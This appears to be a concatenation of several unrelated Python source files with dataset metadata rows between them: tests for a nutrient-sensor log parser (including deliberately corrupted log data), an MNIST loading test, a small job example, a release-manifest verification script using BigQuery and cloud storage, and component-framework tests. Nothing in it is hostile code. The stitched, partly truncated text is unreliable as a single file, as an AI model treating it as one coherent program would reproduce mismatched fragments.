2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
# NOTE(review): variant of TEST_DATA with deliberately corrupted content --
# the truncated status line (":onds.") and the mangled sample lines around
# 15:31:08 (backslash date separators, a sample with no timestamp prefix)
# exercise the parser's garbage-skipping; test_bad_data expects the first
# cleanly recovered record to be particle C.
BAD_TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012\12\13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
def state_callback(self, pos, file_ingested):
    """Record the state handed back through the parser's position callback."""
    log.trace("SETTING state_callback_value to %s" % pos)
    self.file_ingested = file_ingested
    self.position_callback_value = pos
def pub_callback(self, pub):
    """Record whatever the parser hands back through the publish callback."""
    log.trace("SETTING publish_callback_value to %s" % pub)
    self.publish_callback_value = pub
def setUp(self):
    """Build the parser config, an initial state and the expected particles."""
    ParserUnitTestCase.setUp(self)
    self.config = {
        DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.nutnrb',
        DataSetDriverConfigKeys.PARTICLE_CLASS: 'NutnrbDataParticle'
    }
    # plain parser position state, not a DataSourceLocation
    self.position = {StateKey.POSITION: 0}
    # expected particles, keyed by the attribute suffix (particle_<key>);
    # built in a fixed order to match the original explicit assignments
    expected_samples = [
        ('a', "2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000\n"),
        ('b', "2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231\n"),
        ('c', "2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191\n"),
        ('d', "2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203\n"),
        ('e', "2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212\n"),
        ('z', "2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240\n"),
    ]
    for suffix, raw_sample in expected_samples:
        setattr(self, 'particle_' + suffix, NutnrbDataParticle(raw_sample))
    self.position_callback_value = None
    self.publish_callback_value = None
def assert_result(self, result, position, particle):
    """Assert one read produced *particle* and left the parser at *position*.

    Checks the returned record list, the parser's internal state, the value
    reported through the state callback, and the last published particle.
    """
    self.assertEqual(result, [particle])
    self.assertEqual(self.parser._state[StateKey.POSITION], position)
    self.assertEqual(self.position_callback_value[StateKey.POSITION], position)
    # Fix: self.assert_ is a deprecated alias of assertTrue that was removed
    # in Python 3.12; assertIsInstance performs the same check.
    self.assertIsInstance(self.publish_callback_value, list)
    self.assertEqual(self.publish_callback_value[0], particle)
def test_happy_path(self):
    """
    Test the happy path of operations where the parser takes the input
    and spits out a valid data particle given the stream.
    """
    new_state = {}
    self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
    self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
                               self.state_callback, self.pub_callback)
    # read the four valid records one at a time, checking position after each
    expected = [(2458, self.particle_a),
                (2544, self.particle_b),
                (2630, self.particle_c),
                (2716, self.particle_d)]
    for position, particle in expected:
        result = self.parser.get_records(1)
        self.assert_result(result, position, particle)
    # no data left, dont move the position
    result = self.parser.get_records(1)
    self.assertEqual(result, [])
    self.assertEqual(self.parser._state[StateKey.POSITION], 2716)
    self.assertEqual(self.position_callback_value[StateKey.POSITION], 2716)
    # Fix: self.assert_ (deprecated alias, removed in Python 3.12) replaced
    # with the equivalent assertIsInstance.
    self.assertIsInstance(self.publish_callback_value, list)
    self.assertEqual(self.publish_callback_value[0], self.particle_d)
def test_get_many(self):
    """Reading two records in one get_records() call yields both particles."""
    self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
    self.parser = NutnrbParser(self.config, {}, self.stream_handle,
                               self.state_callback, self.pub_callback)
    records = self.parser.get_records(2)
    self.assertEqual(records, [self.particle_a, self.particle_b])
    # position should point just past particle B
    self.assertEqual(self.parser._state[StateKey.POSITION], 2544)
    self.assertEqual(self.position_callback_value[StateKey.POSITION], 2544)
    self.assertEqual(self.publish_callback_value[0], self.particle_a)
    self.assertEqual(self.publish_callback_value[1], self.particle_b)
def test_bad_data(self):
    """A corrupted sample in the stream is skipped over by the parser."""
    self.stream_handle = StringIO(NutnrbParserUnitTestCase.BAD_TEST_DATA)
    self.parser = NutnrbParser(self.config, {}, self.stream_handle,
                               self.state_callback, self.pub_callback)
    # the first cleanly recovered record after the garbage is particle C
    records = self.parser.get_records(1)
    self.assert_result(records, 2603, self.particle_c)
def test_long_stream(self):
    """Pulling many records from a longer stream ends on the last particle."""
    self.stream_handle = StringIO(NutnrbParserUnitTestCase.LONG_DATA)
    self.parser = NutnrbParser(self.config, {}, self.stream_handle,
                               self.state_callback, self.pub_callback)
    records = self.parser.get_records(11)
    self.assertEqual(records[-1], self.particle_z)
    self.assertEqual(self.parser._state[StateKey.POSITION], 3232)
    self.assertEqual(self.position_callback_value[StateKey.POSITION], 3232)
    self.assertEqual(self.publish_callback_value[-1], self.particle_z)
def test_mid_state_start(self):
    """Starting from a mid-stream state resumes reading at particle D."""
    start_state = {StateKey.POSITION: 2628}
    self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
    self.parser = NutnrbParser(self.config, start_state, self.stream_handle,
                               self.state_callback, self.pub_callback)
    records = self.parser.get_records(1)
    self.assert_result(records, 2716, self.particle_d)
def reset_parser(self, state=None):
    """Re-create the parser over TEST_DATA, optionally seeded with *state*.

    Also clears the recorded callback values from any previous parser.

    Fix: the original default ``state = {}`` was a mutable default argument,
    shared across calls -- state mutated by one parser would leak into the
    next no-argument call.  A fresh dict is now created per call.
    """
    if state is None:
        state = {}
    self.state_callback_values = []
    self.publish_callback_values = []
    self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
    self.parser = NutnrbParser(self.config, state, self.stream_handle,
                               self.state_callback, self.pub_callback)
def test_set_state(self):
    """Setting the state mid-stream resumes reading just after particle B."""
    target_state = {StateKey.POSITION: 2544}
    self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
    self.parser = NutnrbParser(self.config, self.position, self.stream_handle,
                               self.state_callback, self.pub_callback)
    records = self.parser.get_records(1)
    self.assert_result(records, 2458, self.particle_a)
    self.reset_parser(target_state)
    self.parser.set_state(target_state)  # seek to after particle_b
    records = self.parser.get_records(1)
    #
    # If particles C and D appear, but the position is off
    # it is because you are not consuming newlines in your
    # DATA_REGEX pattern
    #
    self.assert_result(records, 2630, self.particle_c)
    records = self.parser.get_records(1)
    self.assert_result(records, 2716, self.particle_d)
| 52.087912 | 135 | 0.713966 | 22,968 | 0.969114 | 0 | 0 | 23,064 | 0.973165 | 0 | 0 | 17,530 | 0.739662 |
5e21a247589e39c95147d3bf4195c32dff706fc9 | 1,252 | py | Python | wp/tests/data/test_benchmark.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/tests/data/test_benchmark.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/tests/data/test_benchmark.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null |
import numpy as np
import pytest
import os
from modules.data import BenchmarkData, DataSetType
# Resolve the dataset location relative to this test file:
# <this dir>/../../datasets/mnist
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
BASE_PATH = os.path.join(DIR_PATH, "..", "..")
MNIST_PATH = os.path.join(BASE_PATH, "datasets", "mnist")
class TestBenchmarkData:
    """
    Test functionality of BenchmarkData.
    *To perform this test data needs to be present*
    """

    def test_load_mnist_data(self):
        """The MNIST loader yields matching, non-empty inputs and targets."""
        dataset = BenchmarkData(DataSetType.MNIST, MNIST_PATH)
        assert len(dataset.inputs) > 0
        assert len(dataset.targets) > 0
        assert len(dataset.inputs) == len(dataset.targets)

    def test_subset_class_loader(self):
        """Restricting to N classes yields exactly N distinct target values."""
        num_classes = 3
        dataset = BenchmarkData(DataSetType.MNIST, MNIST_PATH,
                                classes=num_classes)
        assert np.unique(dataset.targets).size == num_classes

    def test_load_without_path(self):
        """Omitting the dataset path raises a TypeError."""
        with pytest.raises(TypeError):
            BenchmarkData(DataSetType.MNIST)

    def test_load_non_existent_dataset(self):
        """An unknown dataset identifier raises an exception."""
        with pytest.raises(Exception):
            BenchmarkData("Hello", MNIST_PATH)
5e2225346054d6facdf73eafd32caba7ecf7dd78 | 342 | py | Python | src/taskmaster/example.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | [
"Apache-2.0"
] | 2 | 2015-11-08T12:45:38.000Z | 2017-06-03T09:16:16.000Z | src/taskmaster/example.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | [
"Apache-2.0"
] | null | null | null | src/taskmaster/example.py | alex/taskmaster | 04a03bf0853facf318ce98192db6389cdaaefe3c | [
"Apache-2.0"
] | null | null | null | """
taskmaster.example
~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
def get_jobs(last=0):
    """Yield job ids from *last* up to (but not including) 20000.

    ``last`` would be sent if state was resumed from a previous run.
    """
    # Fix: ``xrange`` is Python-2-only (NameError on Python 3); ``range``
    # iterates over the same values on both versions.
    for i in range(last, 20000):
        yield i
def handle_job(i):
    """Handle a single job id; placeholder that intentionally does nothing."""
    # A real worker would process job ``i`` here (e.g. print "Got %r!" % i).
    pass
5e23a07b704af65d2c0b32c7f204c45be14b5405 | 12,567 | py | Python | orchestration/hca_manage/verify_release_manifest.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 5 | 2020-05-07T14:18:53.000Z | 2021-03-31T21:30:37.000Z | orchestration/hca_manage/verify_release_manifest.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 232 | 2020-05-28T16:47:22.000Z | 2022-03-08T21:08:42.000Z | orchestration/hca_manage/verify_release_manifest.py | DataBiosphere/hca-ingest | 1f5e8ad7450ff8caff3bb8c8d6b8f7acd8a37f68 | [
"BSD-3-Clause"
] | 1 | 2020-08-19T16:33:54.000Z | 2020-08-19T16:33:54.000Z | """
Given a file containing a list of constituent staging dirs for a DCP release (aka a manifest),
verify that data has been loaded from each of them to the target DCP dataset and the count of loaded files
matches the # in the staging area.
Files are determined to be loaded if they exist at the desired target path and crc as defined in the staging
areas descriptors. It's possible that an expected file was loaded by another staging dir (i.e,. they both
contain the same file). While this is discouraged, it's technically possible and we need to accommodate that.
So, we check if the target path was loaded, disregarding the source staging dir.
Additionally, this will check that metadata was loaded properly (including links) by pull the entity_id, version and
content from the files in GS and checking that the expected row is present in the given dataset. If a newer version
is present in the repo than is staged, we consider that valid.
Example invocation:
python verify_release_manifest.py -f testing.csv -g fake-gs-project -b fake-bq-project -d fake-dataset
"""
import argparse
import json
import logging
import sys
from dataclasses import dataclass
from datetime import datetime
from collections import defaultdict
from functools import partial
from multiprocessing import Pool
from typing import Tuple
from urllib.parse import urlparse
from dateutil import parser
from google.cloud import bigquery, storage
from google.cloud.storage.client import Client
from dagster_utils.contrib.google import get_credentials
from hca_orchestration.solids.load_hca.data_files.load_data_metadata_files import FileMetadataTypes
from hca_orchestration.solids.load_hca.non_file_metadata.load_non_file_metadata import NonFileMetadataTypes
from hca_orchestration.support.dates import parse_version_to_datetime
logging.basicConfig(level=logging.INFO, format='%(message)s')
@dataclass(frozen=True)
class PathWithCrc:
path: str
crc32c: str
@dataclass(frozen=True)
class StagingAreaVerificationResult:
has_metadata_errors: bool
has_file_errors: bool
def has_errors(self) -> bool:
return self.has_metadata_errors or self.has_file_errors
def get_staging_area_file_descriptors(storage_client: Client, staging_areas: set[str]) -> dict[str, set[PathWithCrc]]:
"""
Given a set of GS staging areas, return the downloaded descriptors present in each area
"""
expected: dict[str, set[PathWithCrc]] = defaultdict(set[PathWithCrc])
for staging_area in staging_areas:
url = urlparse(staging_area)
for file_type in FileMetadataTypes:
prefix = f"{url.path.lstrip('/')}/descriptors/{file_type.value}"
blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))
for blob in blobs:
parsed = json.loads(blob.download_as_text())
path_with_crc = PathWithCrc(target_path_from_descriptor(parsed), parsed["crc32c"])
expected[staging_area].add(path_with_crc)
return expected
def target_path_from_descriptor(descriptor: dict[str, str]) -> str:
return f"/v1/{descriptor['file_id']}/{descriptor['crc32c']}/{descriptor['file_name']}"
def find_files_in_load_history(bq_project: str, dataset: str,
areas: dict[str, set[PathWithCrc]]) -> dict[str, set[PathWithCrc]]:
client = bigquery.Client(project=bq_project)
loaded_paths = {}
for area, paths_with_crc in areas.items():
logging.debug(f"\tPulling loaded files for area {area}...")
target_paths = [path_with_crc.path for path_with_crc in paths_with_crc]
query = f"""
SELECT target_path, checksum_crc32c
FROM `datarepo_{dataset}.datarepo_load_history` dlh
WHERE state = 'succeeded'
AND target_path IN UNNEST(@paths)
"""
job_config = bigquery.QueryJobConfig(
query_parameters=[
bigquery.ArrayQueryParameter("paths", "STRING", target_paths),
]
)
query_job = client.query(query, job_config=job_config)
loaded_paths[area] = {PathWithCrc(row["target_path"], row["checksum_crc32c"]) for row in
query_job}
return loaded_paths
def parse_manifest_file(manifest_file: str) -> list[str]:
with open(manifest_file) as manifest:
# some of the staging areas submitted via the form need slight cleanup
return [area.rstrip('\n/').strip() for area in manifest]
def process_staging_area(area: str, gs_project: str, bq_project: str, dataset: str,
release_cutoff: datetime) -> StagingAreaVerificationResult:
logging.info(f"Processing staging area = {area}")
creds = get_credentials()
storage_client = storage.Client(project=gs_project, credentials=creds)
expected_loaded_paths = get_staging_area_file_descriptors(storage_client, {area})
loaded_paths_by_staging_area = find_files_in_load_history(bq_project, dataset, expected_loaded_paths)
has_file_error = False
for area, paths_with_crc in expected_loaded_paths.items():
load_paths_for_staging_area = loaded_paths_by_staging_area[area]
diff = paths_with_crc - load_paths_for_staging_area
loaded = len(load_paths_for_staging_area)
staged = len(paths_with_crc)
if diff:
logging.warning(
f"❌ area = {area} - (data files) Mismatched loaded paths; expected files loaded = {staged}, actual loaded = {loaded}"
)
logging.debug(diff)
has_file_error = True
else:
logging.info(
f"✅ area = {area} - (data files) expected files loaded = {staged}, actual loaded = {loaded}"
)
has_metadata_error = verify_metadata(area, bq_project, dataset, release_cutoff)
return StagingAreaVerificationResult(has_metadata_error, has_file_error)
def inspect_entities_at_path(storage_client: Client, bq_client: bigquery.Client, bq_project: str,
bq_dataset: str, staging_area: str, prefix: str, entity_type: str,
release_cutoff: datetime) -> bool:
metadata_entities: dict[str, Tuple[str, str]] = {}
url = urlparse(staging_area)
if prefix:
prefix = f"{url.path.lstrip('/')}/{prefix}/{entity_type}"
else:
prefix = f"{url.path.lstrip('/')}/{entity_type}"
blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))
for blob in blobs:
content = blob.download_as_text()
file_name = blob.name.split('/')[-1]
entity_id = file_name.split('_')[0]
version = file_name.split('_')[1].replace('.json', '')
# files may be staged after we import, guard against those versions being present
version_timestamp = parse_version_to_datetime(version)
if version_timestamp > release_cutoff:
logging.info(f"Ignoring file {file_name} staged after cutoff")
continue
# multiple versions may be staged, the latest one should win
if entity_id in metadata_entities:
existing_version, _ = metadata_entities[entity_id]
if existing_version >= version:
continue
metadata_entities[entity_id] = (version, content)
if len(metadata_entities) == 0:
if entity_type == 'links':
logging.debug(f"area = {staging_area} no links data found")
return False
logging.debug(f"️area = {staging_area} No metadata for {entity_type} expected, skipping")
return False
logging.debug(f"Querying for metadata entities of type {entity_type} [area={staging_area}]")
entity_ids = metadata_entities.keys()
query = f"""
SELECT {entity_type}_id, content, version FROM `{bq_project}.datarepo_{bq_dataset}.{entity_type}`
WHERE {entity_type}_id IN UNNEST(@entity_ids)
"""
job_config = bigquery.QueryJobConfig(
query_parameters=[
bigquery.ArrayQueryParameter("entity_ids", "STRING", entity_ids),
]
)
query_job = bq_client.query(query, job_config=job_config)
rows = {row[f'{entity_type}_id']: (row['version'], row['content']) for row in query_job.result()}
has_error = False
for key, (version, content) in metadata_entities.items():
if key not in rows.keys():
logging.info(f"❌ area = {staging_area} {entity_type} ID {key} not in table")
return True
row = rows[key]
parsed_version = parser.parse(version)
if parsed_version < row[0]:
# old version staged but a newer version was present, ignore
logging.debug(
f"Newer version of entity present in repo, ignoring. [area={staging_area}, entity_type={entity_type}, id={key}]"
)
continue
if not parser.parse(version) == row[0]:
has_error = True
logging.info(f"❌ area = {staging_area} {entity_type} ID {key} version is incorrect")
if not json.loads(content) == json.loads(row[1]):
has_error = True
logging.info(f"❌ area = {staging_area} {entity_type} ID {key} content is incorrect")
logging.debug(
f"✅ area = {staging_area} - (metadata) all {entity_type} entities found ({len(metadata_entities.keys())} entities)")
return has_error
def verify_metadata(staging_area: str, bq_project: str, bq_dataset: str, release_cutoff: datetime) -> bool:
creds = get_credentials()
storage_client = storage.Client(project="broad-dsp-monster-hca-prod", credentials=creds)
client = bigquery.Client(project=bq_project)
logging.debug(f"Verifying metadata for {staging_area}")
links_errors = inspect_entities_at_path(
storage_client,
client,
bq_project,
bq_dataset,
staging_area,
"",
"links",
release_cutoff
)
non_file_metadata_errors = [
inspect_entities_at_path(
storage_client,
client,
bq_project,
bq_dataset,
staging_area,
"metadata",
non_file_metadata_type.value,
release_cutoff
) for non_file_metadata_type in
NonFileMetadataTypes]
file_metadata_errors = [
inspect_entities_at_path(
storage_client,
client, bq_project,
bq_dataset,
staging_area,
"metadata",
file_metadata_type.value,
release_cutoff
) for file_metadata_type in FileMetadataTypes]
return any(file_metadata_errors) or any(non_file_metadata_errors) or links_errors
def verify(manifest_file: str, gs_project: str, bq_project: str,
dataset: str, pool_size: int, release_cutoff: str) -> int:
staging_areas = parse_manifest_file(manifest_file)
parsed_cutoff = datetime.fromisoformat(release_cutoff)
logging.info("Parsing manifest...")
logging.info(f"Release cutoff = {release_cutoff}")
logging.info(f"{len(staging_areas)} staging areas in manifest.")
logging.info(f"Inspecting staging areas (pool_size = {pool_size})...")
# we multiprocess because this takes quite awhile for > 10 projects, which is common for our releases
frozen = partial(
process_staging_area,
gs_project=gs_project,
bq_project=bq_project,
dataset=dataset,
release_cutoff=parsed_cutoff)
if pool_size > 0:
with Pool(pool_size) as p:
results = p.map(frozen, staging_areas)
else:
results = [frozen(area) for area in staging_areas]
logging.info('-' * 80)
if any(map(lambda x: x.has_errors(), results)):
logging.error(f"❌ Manifest {manifest_file} had errors")
return 1
else:
logging.info(f"✅ Manifest {manifest_file} had no errors")
return 0
if __name__ == '__main__':
argparser = argparse.ArgumentParser()
argparser.add_argument("-f", "--manifest-file", required=True)
argparser.add_argument("-g", "--gs-project", required=True)
argparser.add_argument("-b", "--bq-project", required=True)
argparser.add_argument("-d", "--dataset", required=True)
argparser.add_argument("-p", "--pool-size", type=int, default=4)
argparser.add_argument("-r", "--release-cutoff", required=True)
args = argparser.parse_args()
exit_code = verify(
args.manifest_file,
args.gs_project,
args.bq_project,
args.dataset,
args.pool_size,
args.release_cutoff)
sys.exit(exit_code)
| 38.787037 | 133 | 0.675181 | 239 | 0.018991 | 0 | 0 | 287 | 0.022805 | 0 | 0 | 3,743 | 0.297418 |
5e2476302965d3f750b92ecaf21e5583f8afcf03 | 7,780 | py | Python | camd3/infrastructure/component/tests/test_component.py | mamrhein/CAmD3 | d20f62295771a297c3fbb314beef314e5ec7a2b5 | [
"BSD-2-Clause"
] | null | null | null | camd3/infrastructure/component/tests/test_component.py | mamrhein/CAmD3 | d20f62295771a297c3fbb314beef314e5ec7a2b5 | [
"BSD-2-Clause"
] | null | null | null | camd3/infrastructure/component/tests/test_component.py | mamrhein/CAmD3 | d20f62295771a297c3fbb314beef314e5ec7a2b5 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# Name: test_component
# Purpose: Test driver for module component
#
# Author: Michael Amrhein (michael@adrhinum.de)
#
# Copyright: (c) 2014 Michael Amrhein
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module component"""
from abc import ABC
from numbers import Number
from typing import Tuple
import unittest
from camd3.infrastructure.component import (
Attribute, Component, ComponentLookupError, Immutable, implementer)
from camd3.infrastructure.component.component import _ABCSet, ComponentMeta
# Attributes present in every freshly created class namespace.
DFLT_NAMESPACE = ('__module__', '__qualname__', '__doc__')
# --- Test fixtures: component classes, implementers and adapter factories ---
class TestComp1(Component):
"""TestComp1"""
# Component with a mix of Attribute descriptors, a method and a property;
# test_constructor checks the descriptors receive their attribute names.
class TestComp2(Component):
"""TestComp2"""
attr1 = Attribute()
attr2 = Attribute()
def meth(self):
pass
attr3 = Attribute()
@property
def prop(self):
pass
# Concrete class registered as implementer of both components.
@implementer(TestComp1, TestComp2)
class TestImpl(Component):
def __init__(self):
pass
# Callable adapter factory: Number -> TestComp1.
class TestComp1Factory:
def __call__(self, i: Number) -> TestComp1:
return TestImpl()
# Plain-function adapters; the annotations drive adapter registration.
def Number2TestComp1(i: Number) -> TestComp1: # noqa: D103
return TestImpl()
def Str2TestComp2(s: str) -> TestComp2: # noqa: D103
return TestImpl()
# Non-Component ABC registered as implementer of TestComp1.
@implementer(TestComp1)
class TestABC(ABC):
pass
# Component customizing subclass creation via __init_subclass__.
class TestComp3(Component):
"""TestComp3"""
def __init_subclass__(subcls, **kwds): # noqa: D105
try:
param = kwds.pop('param')
except KeyError:
pass
else:
subcls.param = param
# Subclass passing a class keyword consumed by TestComp3.__init_subclass__.
class TestImpl3(TestComp3, param='P'):
pass
# Immutable component hierarchy; ComponentMeta is expected to force
# __slots__ on these (checked in test_constructor).
class TestComp4(Component, Immutable):
"""TestComp4"""
class TestComp5(TestComp4):
"""TestComp5"""
a = Attribute()
b = Attribute()
class TestComp6(TestComp5):
"""TestComp6"""
c = Attribute()
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
# Adapter factories targeting TestComp6 from arbitrary objects / tuples.
def Obj2TestComp6(obj: object) -> TestComp6: # noqa: D103
return TestComp6(obj, None, None)
def Tuple2TestComp6(tpl: Tuple[int, int, str]) -> TestComp6: # noqa: D103
return TestComp6(*tpl)
class TestComp7(TestComp6):
"""TestComp7"""
# Snapshots self.initialized during __init__ (used by ComponentTest).
class TestComp8(TestComp1):
"""TestComp8"""
def __init__(self, a):
self.a = a
